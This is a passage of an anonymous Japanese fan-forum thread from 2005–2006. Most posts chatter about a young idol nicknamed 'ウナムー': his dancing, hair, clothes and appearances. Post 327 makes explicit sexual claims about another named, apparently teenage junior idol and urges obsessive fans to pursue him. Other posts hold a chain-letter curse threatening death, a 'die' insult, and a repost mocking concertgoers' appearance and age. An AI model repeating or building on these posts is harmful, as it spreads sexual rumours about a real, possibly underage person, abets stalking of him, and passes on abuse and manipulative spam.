飼ってるもう一匹の犬の名前なんじゃないの!?182タソ

184 :ユーが名無しネ:2005/06/29(水) 19:25:31
2匹飼ってるなんて初めて知りました産休なんじゃないの!?183タソ

185 :ユーが名無しネ:2005/06/29(水) 22:22:55
ベルもブルドックなの!?ウナムー

186 :ユーが名無しネ:2005/06/29(水) 22:51:06
折気ネタは止めておいた方がいいんじゃないの!?ウナムー担

187 :ユーが名無しネ:2005/06/29(水) 23:49:00
サムベルのことならむかーしむかしの名鑑ネタなんじゃないの!?ウナムーもね

188 :ユーが名無しネ:2005/06/30(木) 06:51:22
ベルは名鑑にのってた記憶がないが折木ネタでも度が過ぎなければありがたいんじゃないの!?ウナムー
雑誌も名鑑もない今情報がいつまでたっても若いウナムーのままなんじゃないの!?ウナムー

189 :ユーが名無しネ:2005/07/01(金) 01:45:45
そうなるとサムとベルがまだ生存してるのかアヤシイ所なんじゃないの!?ウナムー

190 :ユーが名無しネ:2005/07/01(金) 12:57:16
夏の予定が木になるんじゃないの!?ウナムー

191 :ユーが名無しネ:2005/07/01(金) 22:40:30
歌口ずさんでるけど歌詞メチャクチャなんじゃないの!?ウナムー

192 :ユーが名無しネ:2005/07/01(金) 22:44:46
余りにもメチャクチャすぎてなんだか微笑ましいんじゃないの!?ウナムー

193 :ユーが名無しネ:2005/07/02(土) 00:13:49
ベルはミニチュアシュナウザーなんじゃないの!?ウナムー

194 :ユーが名無しネ:2005/07/02(土) 00:54:32
そんなお洒落な犬とブルドックってどうなの!?ウナムー

195 :ユーが名無しネ:2005/07/02(土) 00:56:05
194タソお約束微妙に違うんじゃないの!?194タソ

196 :ユーが名無しネ:2005/07/02(土) 01:26:53
195タソ
スマソ…とりあえず逝ってきますorz

197 :ユーが名無しネ:2005/07/02(土) 08:58:38
あそこまで堂々と歌詞メチャクチャやられたらアッパレなんじゃないの!?ウナムー

198 :ユーが名無しネ:2005/07/02(土) 20:55:33
チーズのCMで牛の着ぐるみがダンスしてて誰かさんみたいと思ったんじゃないの!?ウナムー

199 :ユーが名無しネ:2005/07/04(月) 09:37:27
よく考えたらエンヤコラセーを踊ったのは初めてなんじゃないの!?ウナムー

200 :ユーが名無しネ:2005/07/04(月) 17:56:41
ああそういえばそんな呼ばれない時期もあったことを思い出したんじゃないの!?ウナムー

201 :ユーが名無しネ:2005/07/04(月) 20:50:48
ゆにらのカノゾ麻●子タソのブログhttp://ma1k0.blog11.fc2.com/アクセスアップのために貼ってんじゃないの!?サム

202 :ユーが名無しネ:2005/07/04(月) 23:24:02
初めてじゃないんじゃないの!?ウナムー

203 :ユーが名無しネ:2005/07/04(月) 23:31:56
今まで太鼓専門だったからエンヤコラセーのとこ踊ったのは初めてなんじゃないの!?ウナムー

204 :ユーが名無しネ:2005/07/05(火) 16:25:27
アシポムに注目されてしまった件

205 :ユーが名無しネ:2005/07/05(火) 20:30:39
元々ヲタは基地ヲバだらけだし今更どうってことないんじゃないの!?ウナムー

206 :ユーが名無しネ:2005/07/06(水) 10:49:50
海苔弁当ペッタリだなんてヒドイ言われようなんじゃないの!?ウナムー

207 :ユーが名無しネ:2005/07/06(水) 17:01:14
笛担に入札負けるなんてらしくないんじゃないの!?ばあやー

208 :ユーが名無しネ:2005/07/09(土) 00:32:32
タモステで禁忌のフラワーにウナムー映りこんでたよね?

209 :ユーが名無しネ:2005/07/10(日) 20:44:53
鑢の口パク素敵だったんじゃないの!?ウナムー

210 :ユーが名無しネ:2005/07/10(日) 21:09:48
http://gw.st/pc/i/283244.html
三十路ヲバの年齢詐称マガ

211 :ユーが名無しネ:2005/07/11(月) 18:46:01
あの口パクでこそウナムーなんじゃないの!?ウナムー

212 :ユーが名無しネ:2005/07/12(火) 23:29:33
三十路ヲバ身内バレしてマガ消したね
ウナムーに抱いて欲しいとか勘弁して欲しいんじゃないの!?三十路ヲバ

213 :ユーが名無しネ:2005/07/12(火) 23:30:58
どうでもいいんじゃないの!?三十路ヲバ

214 :ユーが名無しネ:2005/07/12(火) 23:48:10
そんな事より明日も素敵な口パクに期待したいんじゃないの!?

215 :ユーが名無しネ:2005/07/12(火) 23:49:22
ウナムー抜けたスマンorz

216 :ユーが名無しネ:2005/07/13(水) 21:50:22
少蔵先月の5倍ぐらいはでててよかったんじゃないの!?ウナムー

217 :ユーが名無しネ:2005/07/13(水) 21:52:14
ウナムとチャンの名前を電波に乗せたヘンリーは神なんじゃないの?!ウナムー

218 :ユーが名無しネ:2005/07/13(水) 21:55:43
加藤幸宏を加藤鷹風に語るスレきぼんぬなんじゃないの?!ウナムー

219 :ユーが名無しネ:2005/07/13(水) 22:16:23
詳細きぼnくぁwせdrftgyふじこlp;@:なんじゃないの!?>217

220 :ユーが名無しネ:2005/07/13(水) 22:39:59
コーナーで小道具係がウナムーとチャンで、ヘンリーが「カトーくんとタケウチくんが用意してくれた」と発言
これだけなんじゃないな!?ウナムー

221 :ユーが名無しネ:2005/07/13(水) 22:42:17
と適当に書いたら無所属スレにレポ落ちてたからそっち参照ドゾーなんじゃないの!?ミナサン

222 :ユーが名無しネ:2005/07/13(水) 23:20:03
ブレスしてたか知りたいんじゃないの!?参戦姐さん

223 :ユーが名無しネ:2005/07/13(水) 23:21:41
無所スレでのレポでは主語を忘れずになんじゃないの!?ウナムー担

224 :ユーが名無しネ:2005/07/14(木) 00:27:32
ブレス復活してたんじゃないの!?>222タン

225 :224:2005/07/14(木) 00:28:21
全角スマソなんじゃないの!?>ミナサン

226 :224:2005/07/14(木) 00:30:19
しかもage…スマソなんじゃないの!?ミナサンorz

227 :ユーが名無しネ:2005/07/14(木) 00:31:47
ブレスは有ったり無かったりする事は日常茶飯事なんじゃないの!?ウナムー担

228 :ユーが名無しネ:2005/07/16(土) 07:17:02
紺でみるときいつもしてた気がしたがそうでもなかったのか?
気づいた時にはしてたがソモソモ何年モノなんだろう

229 :ユーが名無しネ:2005/07/16(土) 12:43:43
いつも同じのしてるわけじゃなく何パターンもあるんじゃないの!?>228タン

230 :ユーが名無しネ:2005/07/17(日) 06:43:20
そんなこと考えてみたこともなかった
しかもお約束破りしてたのいま気づいたスマソなんじゃないの!?ウナムー

231 :ユーが名無しネ:2005/07/26(火) 06:31:18
いよいよ夏が始まるんじゃないの!?ウナムー

232 :ユーが名無しネ:2005/07/27(水) 02:45:19
Tシャツがピチピチムチムチでステキなんじゃないの!?ウナムー

233 :ユーが名無しネ:2005/07/28(木) 00:01:58
一人だけ靴黒かったんじゃないの!?ウナムー

234 :ユーが名無しネ:2005/07/30(土) 23:42:04
2部髭伸びてたんじゃないの!?ウナムー

235 :ユーが名無しネ:2005/07/31(日) 23:45:09
せっかくだからこのスレで聞きますが
平安ソロで平安の右手にいるダンスのウマーな兄さんがウナムーでFA?
髪が長めで耳掛けしてたんだが


不慣れなのでお約束スルースマソ

236 :ユーが名無しネ:2005/08/01(月) 00:18:01
今日の1部2部ならその通りです>235タンなんじゃないの!?ウナムー

237 :ユーが名無しネ:2005/08/01(月) 01:13:54
今日の1部はやたら髪型気にしてたんじゃないの!?ウナムー

238 :ユーが名無しネ:2005/08/02(火) 08:44:20
236氏ね

239 :ユーが名無しネ:2005/08/03(水) 21:10:16
このスレって今までばあやが全部回してたわけじゃないよな?

240 :ユーが名無しネ:2005/08/04(木) 01:09:44
とりあえずお約束は守って欲しいんじゃないの!?ウナムー

241 :ユーが名無しネ:2005/08/04(木) 01:46:12
元々ここは滅多に回らずレポは紺スレか無所スレでが暗黙の了解だったんじゃないの!?ウナムー

242 :ユーが名無しネ:2005/08/05(金) 12:16:21
何で昨日あらちいなかったのか木になるんじゃないの!?ウナムー

243 :ユーが名無しネ:2005/08/06(土) 17:29:28
屋フオクの姫と王子の2ショットにびっくりじゃないの!?ウナムー

244 :ユーが名無しネ:2005/08/06(土) 22:22:52
>243
巣に戻って出て来ないで欲しいんじゃないの!?ばあやー

245 :ユーが名無しネ:2005/08/10(水) 09:14:35
声高くてキャワユスなんじゃないの!?ウナムー

246 :ユーが名無しネ:2005/08/11(木) 18:43:35
何か、最近は普通に学校に居るらしいよ↑

247 :ユーが名無しネ:2005/08/11(木) 19:16:59
ダメだこりゃ
リアばっか

248 :ユーが名無しネ:2005/08/17(水) 18:49:02
レポどこに落とせばいいかわかんないんじゃないの!?ウナムー

249 :ユーが名無しネ:2005/08/17(水) 20:20:10
個人スレでも紺スレでも好きなところに落とせばいいんじゃないの!?ウナムー

250 :ユーが名無しネ:2005/08/17(水) 20:58:42
いっそKTスレに落としてくれたらいいんじゃないの!?248タン

251 :ユーが名無しネ:2005/08/18(木) 00:08:35
>248姐さんも向こうの方々も
レポはできれば紺スレに落としてほしいんじゃないの!?ウナムー

252 :248:2005/08/18(木) 00:12:52
その後KTスレに落としました
報告が遅くなってスマソ

253 :ユーが名無しネ:2005/08/18(木) 00:23:17
レポ産休なんじゃないの!?>248タン

ただ後々のこと考えると紺スレに落としてほしいという
>251に賛成なんじゃないの!?>ウナ担&KT担&ば(ry

254 :ユーが名無しネ:2005/08/22(月) 22:16:12
ゆっくんゆっくんage

255 :ユーが名無しネ:2005/08/25(木) 00:31:29
乙彼summerなんじゃないの!?ウナムー

256 :ユーが名無しネ:2005/08/26(金) 22:22:10
衣装が萌えたんじゃないの!?ウナムー

257 :ユーが名無しネ:2005/08/26(金) 22:33:33
ダンス気合入ってたんじゃないの!?ウナムー

258 :ユーが名無しネ:2005/08/26(金) 22:35:26
眉毛またなくなったんじゃないの!?ウナムー
シャツ開きすぎなんじゃないの!?ウナムー

259 :ユーが名無しネ:2005/08/26(金) 22:36:05
眉毛よりもみあげないほうが気になったんじゃないの!?ウナムー

260 :ユーが名無しネ:2005/08/26(金) 22:38:09
全部入れないと視界がすっきりしないからなんじゃないの!?ウナムー

261 :ユーが名無しネ:2005/08/26(金) 23:35:22
たくさん映ってよかったんじゃないの!?ウナムー

262 :ユーが名無しネ:2005/08/27(土) 00:32:14
結構前に頭左側刈ったんじゃないの!?259たん

263 :ユーが名無しネ:2005/08/27(土) 00:33:06
>262
しってるけど今日のは余計それが強調されたかんじだったんじゃないの!?ウナムー

264 :ユーが名無しネ:2005/08/27(土) 11:22:47
ウナムーどの衣装か教えてほしいんじゃないの?!

265 :ユーが名無しネ:2005/08/27(土) 11:54:33
お約束を守れないヤシには教えられないんじゃないの!?ウナムー

266 :ユーが名無しネ:2005/08/27(土) 11:58:02
頑張ったけど惜しかった264に笑っちゃったんじゃないの!?ウナムー

267 :(0´∀`)y-ブルーハワイ ◆UVL.eKHfWI :2005/08/30(火) 05:51:15
  ァ  ∧_∧ ァ,、
 ,、'` ( ´∀`) ,、'`
  '`  ( ⊃ ⊂)  '`

268 :ユーが名無しネ:2005/09/03(土) 23:55:13
264です。きまり守らなくてすいませんでした。改めてウナムーどういう髪型か教えてほしいんじゃないの!?ウナムー

269 :ユーが名無しネ:2005/09/04(日) 12:46:30
もう相手にしたくないんじゃないの!?ウナムー

270 :ユーが名無しネ:2005/09/04(日) 16:42:23
幸宏の女は
何系?髪形とか…それがタイプって事だよね?
2005/09/04 12:31 削除

ばあやタイプになりきる気なのばあや

271 :ユーが名無しネ:2005/09/12(月) 17:10:00
あげ

272 :ユーが名無しネ:2005/09/17(土) 00:28:07
つ紺がんがれなんじゃないの!?ウナムー

273 :ユーが名無しネ:2005/09/19(月) 02:40:17
やっぱりカッコヨスなんじゃないの!?ウナムー

274 :ユーが名無しネ:2005/09/19(月) 21:57:20
そんなこと最初からわかってたんじゃないの!?ウナムー

275 :ユーが名無しネ:2005/09/27(火) 20:13:18 0
出とちりなんじゃないの!?ウナムー

276 :ユーが名無しネ:2005/09/30(金) 18:45:31
エイベックスが「のまネコ」Flash収録を中止へ 商標登録も中止依頼
「恋のマイアヒ」のキャラクター「のまネコ」をめぐる問題で、エイベックス・グループ・ホールディングスは9月30日、CDに収録されている特典Flashムービーを今後は付けず、
「のまネコ」の図形商標の登録出願を中止するよう、同キャラクターの著作権を持つ会社に依頼すると発表した。
同社は「多くの方々が共有財産として楽しんでいる『モナー』等について、私たちが何らかの権利を持っているかのような誤解を完全に払拭できると考えたからです」と説明している。
一方、問題をめぐって掲示板サイト「2ちゃんねる」に同社員に対する殺人予告が掲載されたため、警察に被害届を出すことも明らかにした。
「のまネコ」問題をめぐっては、エイベックスが発売したCD「DISCO-ZONE〜恋のマイアヒ〜」が発端。9月、収録されたムービーに登場するキャラクターを
「のまネコ」として、エイベックスネットワークスがキャラクターグッズの販売を始めた。同社サイトにはコピーライト表記もあったことから、
「ネット上のキャラクターを改変して金儲けに使うのは納得できない」などとネットユーザーが反発した。
同社によると、のまネコは「マイアヒ・フラッシュのイメージを残しつつ新たなオリジナリティを加えて別のキャラクターとして
描き下ろされたものであり、もちろん『モナー』とは異なるものとして作っていただいたもの」だった。「まったく別物であり問題ないと考えていた」ため、
海賊版対策として、のまネコの著作権を持つ会社に商標登録出願をしてもらった、という。
同社は「アスキーアート文化をバック・グラウンドとしてもつマイアヒ・フラッシュの知名度が『のまネコ』グッズ販売の一助になると考えておりました」が、
このために混乱を招いたとして、「直ちにマイアヒ・フラッシュの提供を中止し、図形商標の登録出願も取り下げることで、皆さんに安心していただこうと決心した次第です」と説明している。
また同社によると、掲示板サイト「2ちゃんねる」に同社員に対する殺人予告が掲載されたという。これまでも同社や関係者に対して「嫌がらせまがいのことが行われてきた」が、
「善意のファンや一般消費者の方々の声を真摯にうかがおうと思い」特段の措置はとらなかったが、殺人予告は明らかに反社会的であり、見過ごせないとして被害届を出すという。
■さらに画像の入った記事はこちら
  http://www.itmedia.co.jp/news/articles/0509/30/news080.html


277 :ユーが名無しネ:2005/10/01(土) 10:52:26
Feel itの時の衣装ってズニアの衣装じゃなくて普通に売ってる服なんじゃないの!?
駅で着てる人見て思わずワロスなんじゃないの!?ウナムー

278 :ユーが名無しネ:2005/10/03(月) 00:55:36
土曜日大阪で会おうなんじゃないの!?ウナムー

279 :ユーが名無しネ:2005/10/03(月) 02:02:48
昨日で担当やめました
仲良くしてくれた姐さんいろいろありがdでした


280 :ユーが名無しネ:2005/10/03(月) 02:11:23
そんなにMCで引いたのがワロスなんじゃないの!?279タソ

281 :ユーが名無しネ:2005/10/03(月) 02:18:32
じゃあ自分がかわりに降りてあげようかしらなんじゃないの!?279担
アンニュイなダンスでは歳不相応に妖艶なウナだったけど
のトークで男子高校生らしいオヴァカが発揮できて
ばあや大喜びだったんじゃないの!?ウナムー

282 :ユーが名無しネ:2005/10/03(月) 02:22:20
281タソは元々ウナ担じゃないの!?ばあやー

283 :ユーが名無しネ:2005/10/04(火) 22:26:03
そろそろオヤクソク秋田からなしでもいい?
やりはじめといて言うのもなんだが

284 :ユーが名無しネ:2005/10/05(水) 03:14:53
( ・_・)r鹵~~~~~~283


285 :ユーが名無しネ:2005/10/05(水) 15:43:57
返信ありがとなんじゃないの!?ウナムー

286 :ユーが名無しネ:2005/10/05(水) 22:59:01
>285
返信スレで書けなんじゃないの!?285

287 :ユーが名無しネ:2005/10/05(水) 23:17:07
片目誌掲載でウレシイじゃないの!?ウナムー

288 :ユーが名無しネ:2005/10/06(木) 07:20:55
>284
ネ申になんてことするんだ

289 :ユーが名無しネ:2005/10/06(木) 17:48:03
最悪の事態を想定してたら意外とカコヨス

290 :ユーが名無しネ:2005/10/06(木) 23:52:31
あのキャラでこのルックス でぶしたらいいセン逝くと思う

291 :ユーが名無しネ:2005/10/06(木) 23:57:19
デブならもう既になってるんじゃないの!?ウナムー

292 :ユーが名無しネ:2005/10/07(金) 02:32:49
291のオデブタンにデブって言われて失礼しちゃうわよね!?ウナムー

293 :ユーが名無しネ:2005/10/07(金) 16:08:35
微妙なお約束破りはいらないんじゃないの!?292タソ

294 :ユーが名無しネ:2005/10/10(月) 00:53:26
今日はじめて真剣に見たんだけど
カコヨすぎてちょっとびっくりなんじゃないの!?ウナムー
少蔵とかおすすめ映像あったら教えてホスィんじゃないの!?姐タソ

295 :ユーが名無しネ:2005/10/10(月) 23:51:13
じゃ今のうちに鑢番組のウナウサみとけばいいんじゃないの!?>294タソ

296 :ユーが名無しネ:2005/10/24(月) 21:41:02
保守

297 :ユーが名無しネ:2005/10/26(水) 21:31:25
最近スレ全然回してないけど実は次スレに行ったら空回りトークについて加えたくて仕方がない

298 :ユーが名無しネ:2005/10/27(木) 00:53:59
鏝るのも程々にしてほしいんじゃないの!?>297

299 :ユーが名無しネ:2005/10/27(木) 05:30:39
見てるなら回してほしいんじゃないの!?298タソ


300 :ユーが名無しネ:2005/10/27(木) 16:25:15
無理に回す必要もないんじゃないの!?ウナムー

301 :ユーが名無しネ:2005/10/28(金) 20:57:09
今日君が夢に出てきたからしゃちほこに逝くことに
決めたんじゃないの!?ウナムー

302 :ユーが名無しネ:2005/11/07(月) 22:18:09
つ魂見て本気で落ちそうでヤバイんじゃないの!?ウナムー

303 :ユーが名無しネ:2005/11/08(火) 08:53:48
7周年オメなんじゃないの!?ウナムー

304 :ユーが名無しネ:2005/11/08(火) 09:57:43
入所日オメだけどお祝いのケーキは食べすぎない方がいいんじゃないの!?ウナムー

305 :ユーが名無しネ:2005/11/08(火) 23:30:56
今の髪型でずっといてほしいんじゃないの!?ウナムー

306 :ユーが名無しネ:2005/11/09(水) 16:41:29
前髪はそろそろ切ってほしいんじゃないの!?ウナムー

307 :ユーが名無しネ:2005/11/09(水) 21:11:42
でも前髪のおかげで見つけやすいから何とも複雑なんじゃないの!?ウナムー

308 :ユーが名無しネ:2005/11/10(木) 00:38:22
細眉を晒すよりは前髪長いほうがいいかもと思っちゃうんじゃないの!?ウナムー

309 :ユーが名無しネ:2005/11/11(金) 08:53:16
芸能人の整形ビフォアフ画像あるよ!!
http://blog.livedoor.jp/stardom/archives/7739548.html

310 :ユーが名無しネ:2005/11/12(土) 01:42:10
保守の為ちょっとageさせてもらうんじゃないの!?ウナムー

311 :ユーが名無しネ:2005/11/12(土) 02:00:06
最近ますます色気ずいたんじゃないの?!
でも、白いニット帽穴あいてるんじゃないの?!ウナムー

312 :ユーが名無しネ:2005/11/12(土) 02:03:42
PSP大好きだね!
そんなトコが可愛いんじゃないの!?ウナムー

313 :ユーが名無しネ:2005/11/12(土) 02:34:09
折木ネタイラネなんじゃないの!?311-312

314 :ユーが名無しネ:2005/11/12(土) 02:37:52
緑にレスもアレなんだがウナって衣服穴空いてる事多いキガス…るんじゃないの!?ウナムー


パラゾールはタンスに入れた方が良いぞ

315 :ユーが名無しネ:2005/11/12(土) 11:33:53
昔はウッチーと仲良かったけど今は誰と仲良しなんだか
知りたいんじゃないの!?ウナムー

316 :ユーが名無しネ:2005/11/12(土) 11:34:55
折木ネタもたまには嬉しいんじゃないの!?313タン

317 :ユーが名無しネ:2005/11/12(土) 12:25:56
たまには嬉しいじゃなくて緊急事態以外求める場所が違うんじゃないの!?316

318 :ユーが名無しネ:2005/11/12(土) 13:46:18
そう決め付けることもないんじゃないの!?317

319 :ユーが名無しネ:2005/11/12(土) 14:35:03
やっぱりウッチーと仲がいいんじゃないの!?ウナムー

320 :ユーが名無しネ:2005/11/12(土) 14:45:12
まだいたんだってゆうこの驚き責任とってもらおうじゃないの!?ウナムー

321 :ユーが名無しネ:2005/11/12(土) 16:23:04
カステラつ魂で、前列にいた
うちわモッタ綺麗な姐サン二人組に、またまたテレながらハニカミしゃかりきダンスしちゃったんじゃないの!?ウナムー
後ろにいた私はスルーで涙なんじゃいの!?ウナムー
やっぱり、普通の18ちゃいの♂なんじゃないの!?ウナムー

322 :ユーが名無しネ:2005/11/12(土) 16:52:55
いい加減に緑ウザスなんじゃないの!?住人たち

323 :ユーが名無しネ:2005/11/12(土) 17:42:58
構うからなんじゃないの!?322タソ

自演か知らないけどどこもオリキネタ禁止は厨対策込みだろ

324 :ユーが名無しネ:2005/11/12(土) 18:03:48
ここでは厨対策する必要ないんじゃないの!?323

325 :ユーが名無しネ:2005/11/13(日) 00:39:37
緑は島のヤラカシサイトで自称オキニのB型ギャルなんじゃないの!?ウナムー

326 :ユーが名無しネ:2005/11/14(月) 16:23:15
最近寒いから体調が心配なんじゃないの!?ウナムー

327 :ユーが名無しネ:2005/11/14(月) 20:07:33
飯田恭平は繋がるのがくそ簡単なジュニアですね。簡単にやれますよ。だからやらかしのみなさん頑張ってください!
経験者として語りますが飯田はセックス下手ですよ。ええ、それはとても。下手以前にまぐろですからね彼は。彼はセックスは下手ですが(正常位がなんかおかしかったんです)
キスすると鼻がプニプニ当たるんですよ、そこが可愛いですがあとは最悪ですね。
前戯の途中でメール打ち出したりしますから。
あとあそこはでかいって言われてますけど普通より少しでかいくらいなので期待しないほうがいいかと。
精子が甘い?それも事実です。飯田の家は母親が寝るの早いからやるにはもってこいの環境と言えます。なんじゃないの?!ウナムー

328 :ユーが名無しネ:2005/11/14(月) 23:51:05
あいのりのスーザンがウナムーに見えてしょうがないんじゃないんじゃないの!?
ウナムー

329 :ユーが名無しネ:2005/11/16(水) 09:05:53
>328
(・∀・)人(・∀・)

眉毛と体型が禿似なんじゃないの?!ウナム

330 :ユーが名無しネ:2005/11/19(土) 15:27:59
ゆにらがヤ○ティンは有名じゃないの?!ウナムー

331 :ユーが名無しネ:2005/11/21(月) 23:43:52
サンデーに連載されてる野球マンガにウナ顔キャラがいてビックリしたんじゃないの!?ウナムー

332 :ユーが名無しネ:2005/11/26(土) 20:02:52
勉強してるか気になるんじゃないの!?ウナムー

333 :ユーが名無しネ:2005/11/29(火) 23:44:01
なんかオムに似てきたような気もするんじゃないの!?ウナムー

334 :ユーが名無しネ:2005/11/30(水) 02:38:55
昔もオムに似てたんじゃないの?!太るとオムに似てる気がするんじゃないの?!ウナムー

335 :ユーが名無しネ:2005/12/02(金) 02:56:44
相変わらず素敵なんじゃないの?!ウナムー

336 :ユーが名無しネ:2005/12/04(日) 18:44:22
少クラ出ちゃえばイイんじゃないの!?ウナムー

337 :ユーが名無しネ:2005/12/10(土) 00:10:32
お邪魔しますなの!?姐タソ
少倉のつの向かって左の剃り込み入ったのであってるの?!姐タソ

338 :ユーが名無しネ:2005/12/10(土) 00:21:28
剃り込みなんて無かった事にしたいんじゃないの!?ウナムー担
アレは正直どうかtくぁwせdrftgyふじこllp;@なんじゃないの!?ウナムー

339 :ユーが名無しネ:2005/12/10(土) 04:41:28
剃り込みなんて、なかったことにしたいんじゃないの?!スマンね、ウナムー

340 :ユーが名無しネ:2005/12/10(土) 10:31:31
どういう髪型か詳細おしえてくださいなんじゃないの!?

341 :ユーが名無しネ:2005/12/17(土) 13:50:12
剃りこみ頭は説明しずらしんじゃないの!?
今回のパーマも狙いがイマイチ分からないんじゃないの!?ウナムー

342 :ユーが名無しネ:2005/12/17(土) 16:56:55
よろしくです。

加藤! 加藤!! 今来た加藤!!! part3
http://tv8.2ch.net/test/read.cgi/kyon2/1134336777/


343 :ユーが名無しネ:2005/12/25(日) 03:41:47
メリクリ!
なんじゃないの?!ウナムー

344 :ユーが名無しネ:2005/12/29(木) 23:09:49
おつかれ がんがってたな おまいが一番男前だったんじゃないの!?ウナムー

345 :ユーが名無しネ:2006/01/01(日) 17:11:01
あけおめ!
昨日も、しゃかりきダンス良かったけど、間違えすぎて恥ずかしかったんじゃないの?!ウナムー

346 :ユーが名無しネ:2006/01/06(金) 19:37:27
石鹸魂おつかれ 
昨日しゅうまい帰り見られちゃったんじゃないの?!ウナムー!

347 :ユーが名無しネ:2006/01/08(日) 01:14:55
いつも思うけど俳優の山口馬木也に似てるんじゃないの?!ウナムー

348 :ユーが名無しネ:2006/01/12(木) 03:03:39
髪切らなかったほうが良かったんじゃないの?!ウナムー

349 :ユーが名無しネ:2006/01/15(日) 00:19:56
あくまでも自分の周りでは髪切った方がいいねと好評なんじゃないの?!ウナムー

350 :ユーが名無しネ:2006/01/17(火) 07:58:51
(‘∀‘*)

351 :ユーが名無しネ:2006/01/17(火) 12:08:38
加藤違いなんじゃないの!?>350笛

352 :ユーが名無しネ:2006/01/17(火) 13:23:11
KTスレにもあったがウナの投げチスの仕方ってどんなの?
自分見た事ナスorz

353 :ユーが名無しネ:2006/01/17(火) 14:01:46
久々に来てお約束忘れてたorz
逝ってくる

354 :ユーが名無しネ:2006/01/17(火) 23:39:56
丼舞なんじゃないの!?
>352タソ

355 :ユーが名無しネ:2006/01/26(木) 14:11:33
□!!!これを見た貴方は3日以内に死にます!!!■
■死にたくなければ、このレスをコピーして他のスレに □
□10回貼り付けて下さい。1時間以内にです!もし無 ■
■した場合は、今日寝ている間に富子さんがやってきて□
□貴方の首を絞めに来ます。富子さんは太平洋戦争の■
■時に16歳という若さで亡くなった女の子で、未だに成 □
□仏していないそうです。信じる信じないは貴方次第。 ■
■今年になってからこのレスを無視した人で、“呪われ □
□て死亡した人”が続出しています。これは富子さんの ■
■呪い。呪われて死んでもいいのならこれを無視するこ□
□とでしょうね。                        ■
■――貴方がこうしているうちに富子さんが後ろから見□
□ていますよ…。                       ■
■□■□■□■□■□■□■□■□■□■□■□■□


356 :ユーが名無しネ:2006/01/26(木) 18:53:08
下がりすぎなんじゃないの!?

357 :ユーが名無しネ:2006/01/28(土) 01:50:12
平安ガンガってじゃないの?!ウナムー

358 :ユーが名無しネ:2006/01/31(火) 06:43:07
平安笑顔過ぎてフリ間違っちゃったんじゃないの!?ウナムー

359 :ユーが名無しネ:2006/02/04(土) 22:34:32
ウナムー情報くださいなんじゃないの!?ウナムー

360 :ユーが名無しネ:2006/02/05(日) 04:40:12
( ・_・)r鹵~~~~~~~~359

361 :ユーが名無しネ:2006/02/06(月) 02:29:07
⊂`∀´⊃

362 :ユーが名無しネ:2006/02/06(月) 13:13:15
( ・_・)r鹵~~~~~~~~⊂`∀´⊃

363 :ユーが名無しネ:2006/02/07(火) 14:54:21
ピンクメッシュも素敵なんじゃないの!?ウナムー

364 :ユーが名無しネ:2006/02/07(火) 22:59:37
アイドル誌載ったの久しぶりじゃないの?

365 :ユーが名無しネ:2006/02/08(水) 01:02:30
ヌルーしたいとこだがスマソ
オマイラまとめて半年ロムれなんじゃないの!?最近レスしたヤシラ

366 :ユーが名無しネ:2006/02/08(水) 05:21:40
載ったけど肝心な宏の字が間違えられてるんじゃないの!?ウナムー

367 :ユーが名無しネ:2006/02/12(日) 15:47:45
演舞城ってマジで!?ウナムー

368 :ユーが名無しネ:2006/02/12(日) 21:06:08
ないの!?ウナムー

いつまで続くんだよ
いい加減秋田

369 :ユーが名無しネ:2006/02/23(木) 20:40:18
あげ!

370 :ユーが名無しネ:2006/02/23(木) 22:11:57
誰?

371 :ユーが名無しネ:2006/02/24(金) 03:40:57
WHO

372 :ユーが名無しネ:2006/02/28(火) 19:45:19
538 :ななしじゃにー:2006/02/26(日) 23:15:11 ID:lLpt6KnU
マジで子供担が最悪でさ。本気で最悪。
めんたいオーラスの1恥部でのこと。自分D風呂の花道の右だったんだけど。
デブスヲバの3大苦みたいな3人組がいたの。しかもそのうち二人がメガネw
もう一人はノースリでぶっとい腕曝しててみっともないったらないの。
あらち担よりはるかに年齢いってる最悪の3人組ね。
いきなりさ両手に黄色い軍手しだして。なんか黒い文字か刺繍かしらないけど、それに
メッセかなんかかいてあるんじゃないの?
しかも最悪なことに、自分たちの目の前の空間にでっかい鞄置いて空間確保してるわけ。
マジ注意何度も周りしてたけどシカトぶっこいててさ。ヲバってふてぶてしーなと。
そのうちの1人がメガネでパーマでロングなんだけど、オペラグラスで見るのにメガネをいったんはずして
額の上にのっけてるんだけど、マジブサイクで笑えたよ?
両手末期色の軍手して、両方にふってるの。マージ最悪でマジ笑えた。
しかも、そのヲバ3人組の後ろにGUCC○のピンクとチャイロのキャップかぶったノッポなオンナ
ブサじゃなかったけど年齢高め。もう一人いたけど印象に残らないくらいのチビ。
なんか折りたたんだ方眼用紙みたいなのもって上あげるわけ。ナニかいてあったのかなんか
知らないけど。マジ最悪。何度も後から「あげんなよ」って腕下ろされてるのに懲りないんだよ。
「イケチャンオイシーイケチャンオイシー」って聴こえたけど、誰だよ、イケチャンww

平安コンだっつーのに。窓はめちゃスキだけど、窓担マナー悪過ぎ。

373 :ユーが名無しネ:2006/03/01(水) 17:07:14
平安コン気合入ってたんじゃないの!?ウナムー

374 :ユーが名無しネ:2006/03/01(水) 17:08:40
腕輪が紫だったんじゃないの!?ウナムー

375 :ユーが名無しネ:2006/03/01(水) 17:14:19


376 :ユーが名無しネ:2006/03/01(水) 17:14:51


377 :ユーが名無しネ:2006/03/01(水) 17:17:02


378 :ユーが名無しネ:2006/03/01(水) 17:17:39
じょ

379 :ユーが名無しネ:2006/03/01(水) 17:18:22


380 :ユーが名無しネ:2006/03/01(水) 17:20:17


381 :ユーが名無しネ:2006/03/01(水) 17:21:04


382 :ユーが名無しネ:2006/03/01(水) 17:21:39


383 :ユーが名無しネ:2006/03/01(水) 17:22:19


384 :ユーが名無しネ:2006/03/01(水) 17:23:11


385 :ユーが名無しネ:2006/03/01(水) 17:24:05


386 :ユーが名無しネ:2006/03/01(水) 17:24:38


387 :ユーが名無しネ:2006/03/01(水) 17:25:52


388 :ユーが名無しネ:2006/03/01(水) 17:26:25


389 :ユーが名無しネ:2006/03/01(水) 17:26:59


390 :ユーが名無しネ:2006/03/01(水) 17:27:29


391 :ユーが名無しネ:2006/03/01(水) 17:29:47


392 :ユーが名無しネ:2006/03/01(水) 17:30:40


393 :ユーが名無しネ:2006/03/01(水) 17:31:22


394 :ユーが名無しネ:2006/03/01(水) 17:32:04


395 :ユーが名無しネ:2006/03/01(水) 17:32:44


396 :ユーが名無しネ:2006/03/01(水) 17:33:15


397 :ユーが名無しネ:2006/03/01(水) 17:33:54


398 :ユーが名無しネ:2006/03/01(水) 17:40:08


399 :ユーが名無しネ:2006/03/01(水) 17:40:53


400 :ユーが名無しネ:2006/03/01(水) 17:41:51


